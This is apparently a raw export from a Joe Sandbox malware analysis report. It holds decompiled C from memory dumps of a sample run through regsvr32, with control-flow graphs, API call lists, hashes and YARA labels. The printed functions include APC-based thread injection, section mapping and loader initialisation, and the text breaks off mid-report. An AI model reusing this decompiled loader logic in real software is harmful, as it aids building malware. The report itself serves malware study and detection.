                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 026D1A55
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 026D1A6B
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 026D1A81
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 026D1A97
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 026D1AAD
                                                                                                                                                                                                                                      • Part of subcall function 026D1EB5: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,?), ref: 026D1F12
                                                                                                                                                                                                                                      • Part of subcall function 026D1EB5: memset.NTDLL ref: 026D1F34
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1632424568-0
                                                                                                                                                                                                                                    • Opcode ID: b9dadfafa5c804cd065873f90106f49d60a1ae18e31c526c5641a585f9adfd68
                                                                                                                                                                                                                                    • Instruction ID: b4438699aae255629519e8275e89e3df423ef3a1eba9dab73d0e447b00b1f814
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9dadfafa5c804cd065873f90106f49d60a1ae18e31c526c5641a585f9adfd68
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 242104B1E0160EAFD710DFA9DC84EAA7BF8EF4934470544A5E90AD7345E771EA01CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 026D1AFA, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 283 26d1afa-26d1b0e 284 26d1b7f-26d1b8c InterlockedDecrement 283->284 285 26d1b10-26d1b11 283->285 286 26d1bcc-26d1bd3 284->286 287 26d1b8e-26d1b94 284->287 285->286 288 26d1b17-26d1b24 InterlockedIncrement 285->288 289 26d1b96 287->289 290 26d1bc0-26d1bc6 HeapDestroy 287->290 288->286 291 26d1b2a-26d1b3e HeapCreate 288->291 294 26d1b9b-26d1bab SleepEx 289->294 290->286 292 26d1b7a-26d1b7d 291->292 293 26d1b40-26d1b71 call 26d15ee call 26d12dc 291->293 292->286 293->286 301 26d1b73-26d1b76 293->301 296 26d1bad-26d1bb2 294->296 297 26d1bb4-26d1bba CloseHandle 294->297 296->294 296->297 297->290 301->292
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x26d4108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x26d410c;
						if( *0x26d410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x26d4118;
								if( *0x26d4118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x26d410c);
						}
						HeapDestroy( *0x26d4110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x26d4108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x26d4110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x26d4130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E026D12DC(E026D111A, E026D15EE(_a12, 1, 0x26d4118, _t41));
							 *0x26d410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                                                                                                                    0x026d1afd
                                                                                                                                                                                                                                    0x026d1b09
                                                                                                                                                                                                                                    0x026d1b0b
                                                                                                                                                                                                                                    0x026d1b0e
                                                                                                                                                                                                                                    0x026d1b84
                                                                                                                                                                                                                                    0x026d1b8a
                                                                                                                                                                                                                                    0x026d1b8c
                                                                                                                                                                                                                                    0x026d1b8e
                                                                                                                                                                                                                                    0x026d1b94
                                                                                                                                                                                                                                    0x026d1b96
                                                                                                                                                                                                                                    0x026d1b9b
                                                                                                                                                                                                                                    0x026d1b9e
                                                                                                                                                                                                                                    0x026d1ba9
                                                                                                                                                                                                                                    0x026d1bab
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d1bad
                                                                                                                                                                                                                                    0x026d1bb0
                                                                                                                                                                                                                                    0x026d1bb2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d1bb2
                                                                                                                                                                                                                                    0x026d1bba
                                                                                                                                                                                                                                    0x026d1bba
                                                                                                                                                                                                                                    0x026d1bc6
                                                                                                                                                                                                                                    0x026d1bc6
                                                                                                                                                                                                                                    0x026d1b10
                                                                                                                                                                                                                                    0x026d1b11
                                                                                                                                                                                                                                    0x026d1b31
                                                                                                                                                                                                                                    0x026d1b37
                                                                                                                                                                                                                                    0x026d1b39
                                                                                                                                                                                                                                    0x026d1b3e
                                                                                                                                                                                                                                    0x026d1b7a
                                                                                                                                                                                                                                    0x026d1b7a
                                                                                                                                                                                                                                    0x026d1b40
                                                                                                                                                                                                                                    0x026d1b48
                                                                                                                                                                                                                                    0x026d1b4f
                                                                                                                                                                                                                                    0x026d1b59
                                                                                                                                                                                                                                    0x026d1b65
                                                                                                                                                                                                                                    0x026d1b6c
                                                                                                                                                                                                                                    0x026d1b71
                                                                                                                                                                                                                                    0x026d1b76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d1b76
                                                                                                                                                                                                                                    0x026d1b71
                                                                                                                                                                                                                                    0x026d1b3e
                                                                                                                                                                                                                                    0x026d1b11
                                                                                                                                                                                                                                    0x026d1bd3

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(026D4108), ref: 026D1B1C
                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 026D1B31
                                                                                                                                                                                                                                      • Part of subcall function 026D12DC: CreateThread.KERNEL32(00000000,00000000,00000000,?,026D4118,026D1B6A), ref: 026D12F3
                                                                                                                                                                                                                                      • Part of subcall function 026D12DC: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 026D1308
                                                                                                                                                                                                                                      • Part of subcall function 026D12DC: GetLastError.KERNEL32(00000000), ref: 026D1313
                                                                                                                                                                                                                                      • Part of subcall function 026D12DC: TerminateThread.KERNEL32(00000000,00000000), ref: 026D131D
                                                                                                                                                                                                                                      • Part of subcall function 026D12DC: CloseHandle.KERNEL32(00000000), ref: 026D1324
                                                                                                                                                                                                                                      • Part of subcall function 026D12DC: SetLastError.KERNEL32(00000000), ref: 026D132D
                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(026D4108), ref: 026D1B84
                                                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 026D1B9E
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 026D1BBA
                                                                                                                                                                                                                                    • HeapDestroy.KERNEL32 ref: 026D1BC6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2110400756-0
                                                                                                                                                                                                                                    • Opcode ID: 63c0e4fd349d22efe6ddc7d9d86f7b4ac5e0d969009fde8d844eddda844a7673
                                                                                                                                                                                                                                    • Instruction ID: c84fa3e3fe32771f01315ef89359eeebe9905d484c66eb849a998c8ab0fb3f95
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63c0e4fd349d22efe6ddc7d9d86f7b4ac5e0d969009fde8d844eddda844a7673
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2219335E4120DAFD7109F6DEC84E2D7BA5FB7626474458A9F409E3240EBB08DA0CF51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E6A56, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E023E6A56(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x23ed238 = _t10;
				if(_t10 != 0) {
					 *0x23ed1a8 = GetTickCount();
					_t12 = E023E8F10(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L023EB226();
							_t33 = _t14 + _t16;
							_t18 = E023E7E03(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E023E6B96(_t25) != 0) {
							 *0x23ed260 = 1; // executed
						}
						_t12 = E023E225B(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                                                                                                                                                                                                    0x023e6a56
                                                                                                                                                                                                                                    0x023e6a5c
                                                                                                                                                                                                                                    0x023e6a5d
                                                                                                                                                                                                                                    0x023e6a69
                                                                                                                                                                                                                                    0x023e6a71
                                                                                                                                                                                                                                    0x023e6a76
                                                                                                                                                                                                                                    0x023e6a86
                                                                                                                                                                                                                                    0x023e6a8b
                                                                                                                                                                                                                                    0x023e6a92
                                                                                                                                                                                                                                    0x023e6a94
                                                                                                                                                                                                                                    0x023e6a99
                                                                                                                                                                                                                                    0x023e6a9f
                                                                                                                                                                                                                                    0x023e6aa5
                                                                                                                                                                                                                                    0x023e6aaf
                                                                                                                                                                                                                                    0x023e6ab3
                                                                                                                                                                                                                                    0x023e6ab5
                                                                                                                                                                                                                                    0x023e6aba
                                                                                                                                                                                                                                    0x023e6abb
                                                                                                                                                                                                                                    0x023e6abc
                                                                                                                                                                                                                                    0x023e6ac1
                                                                                                                                                                                                                                    0x023e6ac7
                                                                                                                                                                                                                                    0x023e6ad0
                                                                                                                                                                                                                                    0x023e6ad1
                                                                                                                                                                                                                                    0x023e6ad6
                                                                                                                                                                                                                                    0x023e6adc
                                                                                                                                                                                                                                    0x023e6ae8
                                                                                                                                                                                                                                    0x023e6aea
                                                                                                                                                                                                                                    0x023e6aea
                                                                                                                                                                                                                                    0x023e6af4
                                                                                                                                                                                                                                    0x023e6af4
                                                                                                                                                                                                                                    0x023e6a78
                                                                                                                                                                                                                                    0x023e6a7a
                                                                                                                                                                                                                                    0x023e6a7a
                                                                                                                                                                                                                                    0x023e6afe

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,023E807D,?), ref: 023E6A69
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 023E6A7D
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,023E807D,?), ref: 023E6A99
                                                                                                                                                                                                                                    • SwitchToThread.KERNEL32(?,00000001,?,?,?,023E807D,?), ref: 023E6A9F
                                                                                                                                                                                                                                    • _aullrem.NTDLL(?,?,00000009,00000000), ref: 023E6ABC
                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,023E807D,?), ref: 023E6AD6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 507476733-0
                                                                                                                                                                                                                                    • Opcode ID: 3322521493d8dc678d78d8057a811453f31c34a1b54cda9c60d124d8e9c1ea5d
                                                                                                                                                                                                                                    • Instruction ID: d65d25fad09f481b236fc223447c9947c906d913cd18b58cfaf2a5a88eff7b28
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3322521493d8dc678d78d8057a811453f31c34a1b54cda9c60d124d8e9c1ea5d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 231186F2E90214EFEF34AB64EC0AB5E769D9B44750F104929F946DA1C0E7B0D8588A61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 026D12DC, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E026D12DC(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x26d414c, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                                                                                                                                                                                                                    0x026d12f3
                                                                                                                                                                                                                                    0x026d12f9
                                                                                                                                                                                                                                    0x026d12fd
                                                                                                                                                                                                                                    0x026d1308
                                                                                                                                                                                                                                    0x026d1310
                                                                                                                                                                                                                                    0x026d1319
                                                                                                                                                                                                                                    0x026d131d
                                                                                                                                                                                                                                    0x026d1324
                                                                                                                                                                                                                                    0x026d132b
                                                                                                                                                                                                                                    0x026d132d
                                                                                                                                                                                                                                    0x026d1333
                                                                                                                                                                                                                                    0x026d1310
                                                                                                                                                                                                                                    0x026d1337

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00000000,?,026D4118,026D1B6A), ref: 026D12F3
                                                                                                                                                                                                                                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 026D1308
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 026D1313
                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 026D131D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 026D1324
                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 026D132D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3832013932-0
                                                                                                                                                                                                                                    • Opcode ID: 810943e831b34168e1adf9c4f42dacf2e8e1690dc3f7a0557a28a67f489c8eb6
                                                                                                                                                                                                                                    • Instruction ID: 77ef0eee87f0245e4f14caf83862ded832b6232150651316f556cadc67724abf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 810943e831b34168e1adf9c4f42dacf2e8e1690dc3f7a0557a28a67f489c8eb6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6F05E32D82268FBD7215BA0AC08F9EBB68FB09651F415844F605D1240C73088708FA6
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E225B, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 321 23e225b-23e2276 call 23e550e 324 23e228c-23e229a 321->324 325 23e2278-23e2286 321->325 327 23e22ac-23e22c7 call 23e3d0d 324->327 328 23e229c-23e229f 324->328 325->324 334 23e22c9-23e22cf 327->334 335 23e22d1 327->335 328->327 329 23e22a1-23e22a6 328->329 329->327 331 23e242d 329->331 333 23e242f-23e2435 331->333 336 23e22d7-23e22ec call 23e1bf4 call 23e1b2f 334->336 335->336 341 23e22ee-23e22f1 CloseHandle 336->341 342 23e22f7-23e22fc 336->342 341->342 343 23e22fe-23e2303 342->343 344 23e2322-23e233a call 23e2049 342->344 345 23e2419-23e241d 343->345 346 23e2309 343->346 353 23e233c-23e2364 memset RtlInitializeCriticalSection 344->353 354 23e2366-23e2368 344->354 348 23e241f-23e2423 345->348 349 23e2425-23e242b 345->349 350 23e230c-23e231b call 23ea501 346->350 348->333 348->349 349->333 358 23e231d 350->358 357 23e2369-23e236d 353->357 354->357 357->345 359 23e2373-23e2389 RtlAllocateHeap 357->359 358->345 360 23e238b-23e23b7 wsprintfA 359->360 361 23e23b9-23e23bb 359->361 362 23e23bc-23e23c0 360->362 361->362 362->345 363 23e23c2-23e23e2 call 23e269c call 23e4094 362->363 363->345 368 23e23e4-23e23eb call 23e96a4 363->368 371 23e23ed-23e23f0 368->371 372 23e23f2-23e23f9 368->372 371->345 373 23e240e-23e2412 call 23e6786 372->373 374 23e23fb-23e23fd 372->374 377 23e2417 373->377 374->345 375 23e23ff-23e2403 call 23e3dd9 374->375 379 23e2408-23e240c 375->379 377->345 379->345 379->373
                                                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                                                    			E023E225B(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E023E550E();
				if(_t21 != 0) {
					_t59 =  *0x23ed25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x23ed25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x23ed164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E023E3D0D( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x23ed27c; // 0x28da5a8
					if( *0x23ed25c > 5) {
						_t8 = _t26 + 0x23ee5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x23eea15; // 0x44283a44
						_t27 = _t7;
					}
					E023E1BF4(_t27, _t27);
					_t31 = E023E1B2F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x23ed270 =  *0x23ed270 ^ 0x81bbe65d;
						_t32 = E023E2049(0x60);
						__eflags = _t32;
						 *0x23ed32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x23ed32c; // 0x4cc95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x23ed32c; // 0x4cc95b0
							 *_t51 = 0x23ee836;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x23ed238, 0, 0x43);
							__eflags = _t36;
							 *0x23ed2c4 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x23ed25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x23ed27c; // 0x28da5a8
								_t13 = _t58 + 0x23ee55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x23ec2a7);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E023E269C( ~_v8 &  *0x23ed270, 0x23ed00c); // executed
								_t42 = E023E4094(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E023E96A4(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E023E6786(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E023E3DD9(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x23ed160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E023EA501(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                                                                                                                                                                                                                    0x023e225b
                                                                                                                                                                                                                                    0x023e2266
                                                                                                                                                                                                                                    0x023e2269
                                                                                                                                                                                                                                    0x023e226c
                                                                                                                                                                                                                                    0x023e226f
                                                                                                                                                                                                                                    0x023e2276
                                                                                                                                                                                                                                    0x023e2278
                                                                                                                                                                                                                                    0x023e2284
                                                                                                                                                                                                                                    0x023e2286
                                                                                                                                                                                                                                    0x023e2286
                                                                                                                                                                                                                                    0x023e228f
                                                                                                                                                                                                                                    0x023e2297
                                                                                                                                                                                                                                    0x023e229a
                                                                                                                                                                                                                                    0x023e22b4
                                                                                                                                                                                                                                    0x023e22c0
                                                                                                                                                                                                                                    0x023e22c2
                                                                                                                                                                                                                                    0x023e22c7
                                                                                                                                                                                                                                    0x023e22d1
                                                                                                                                                                                                                                    0x023e22d1
                                                                                                                                                                                                                                    0x023e22c9
                                                                                                                                                                                                                                    0x023e22c9
                                                                                                                                                                                                                                    0x023e22c9
                                                                                                                                                                                                                                    0x023e22c9
                                                                                                                                                                                                                                    0x023e22d8
                                                                                                                                                                                                                                    0x023e22e5
                                                                                                                                                                                                                                    0x023e22ec
                                                                                                                                                                                                                                    0x023e22f1
                                                                                                                                                                                                                                    0x023e22f1
                                                                                                                                                                                                                                    0x023e22f9
                                                                                                                                                                                                                                    0x023e22fc
                                                                                                                                                                                                                                    0x023e2322
                                                                                                                                                                                                                                    0x023e232e
                                                                                                                                                                                                                                    0x023e2333
                                                                                                                                                                                                                                    0x023e2335
                                                                                                                                                                                                                                    0x023e233a
                                                                                                                                                                                                                                    0x023e2366
                                                                                                                                                                                                                                    0x023e2368
                                                                                                                                                                                                                                    0x023e233c
                                                                                                                                                                                                                                    0x023e2340
                                                                                                                                                                                                                                    0x023e2345
                                                                                                                                                                                                                                    0x023e234a
                                                                                                                                                                                                                                    0x023e2351
                                                                                                                                                                                                                                    0x023e2357
                                                                                                                                                                                                                                    0x023e235c
                                                                                                                                                                                                                                    0x023e2362
                                                                                                                                                                                                                                    0x023e2369
                                                                                                                                                                                                                                    0x023e236b
                                                                                                                                                                                                                                    0x023e236d
                                                                                                                                                                                                                                    0x023e237c
                                                                                                                                                                                                                                    0x023e2382
                                                                                                                                                                                                                                    0x023e2384
                                                                                                                                                                                                                                    0x023e2389
                                                                                                                                                                                                                                    0x023e23b9
                                                                                                                                                                                                                                    0x023e23bb
                                                                                                                                                                                                                                    0x023e238b
                                                                                                                                                                                                                                    0x023e238b
                                                                                                                                                                                                                                    0x023e2391
                                                                                                                                                                                                                                    0x023e239e
                                                                                                                                                                                                                                    0x023e23a4
                                                                                                                                                                                                                                    0x023e23a4
                                                                                                                                                                                                                                    0x023e23ac
                                                                                                                                                                                                                                    0x023e23b5
                                                                                                                                                                                                                                    0x023e23bc
                                                                                                                                                                                                                                    0x023e23be
                                                                                                                                                                                                                                    0x023e23c0
                                                                                                                                                                                                                                    0x023e23c7
                                                                                                                                                                                                                                    0x023e23d4
                                                                                                                                                                                                                                    0x023e23d9
                                                                                                                                                                                                                                    0x023e23de
                                                                                                                                                                                                                                    0x023e23e0
                                                                                                                                                                                                                                    0x023e23e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e23e4
                                                                                                                                                                                                                                    0x023e23e9
                                                                                                                                                                                                                                    0x023e23eb
                                                                                                                                                                                                                                    0x023e23f2
                                                                                                                                                                                                                                    0x023e23f6
                                                                                                                                                                                                                                    0x023e23f9
                                                                                                                                                                                                                                    0x023e240e
                                                                                                                                                                                                                                    0x023e2412
                                                                                                                                                                                                                                    0x023e2417
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e2417
                                                                                                                                                                                                                                    0x023e23fb
                                                                                                                                                                                                                                    0x023e23fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e2403
                                                                                                                                                                                                                                    0x023e2408
                                                                                                                                                                                                                                    0x023e240a
                                                                                                                                                                                                                                    0x023e240c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e240c
                                                                                                                                                                                                                                    0x023e23ef
                                                                                                                                                                                                                                    0x023e23ef
                                                                                                                                                                                                                                    0x023e23c0
                                                                                                                                                                                                                                    0x023e22fe
                                                                                                                                                                                                                                    0x023e22fe
                                                                                                                                                                                                                                    0x023e2303
                                                                                                                                                                                                                                    0x023e2419
                                                                                                                                                                                                                                    0x023e241d
                                                                                                                                                                                                                                    0x023e2425
                                                                                                                                                                                                                                    0x023e2425
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e241d
                                                                                                                                                                                                                                    0x023e2309
                                                                                                                                                                                                                                    0x023e230c
                                                                                                                                                                                                                                    0x023e2316
                                                                                                                                                                                                                                    0x023e231d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e242d
                                                                                                                                                                                                                                    0x023e242d
                                                                                                                                                                                                                                    0x023e2431
                                                                                                                                                                                                                                    0x023e2435
                                                                                                                                                                                                                                    0x023e2435

                                                                                                                                                                                                                                    APIs
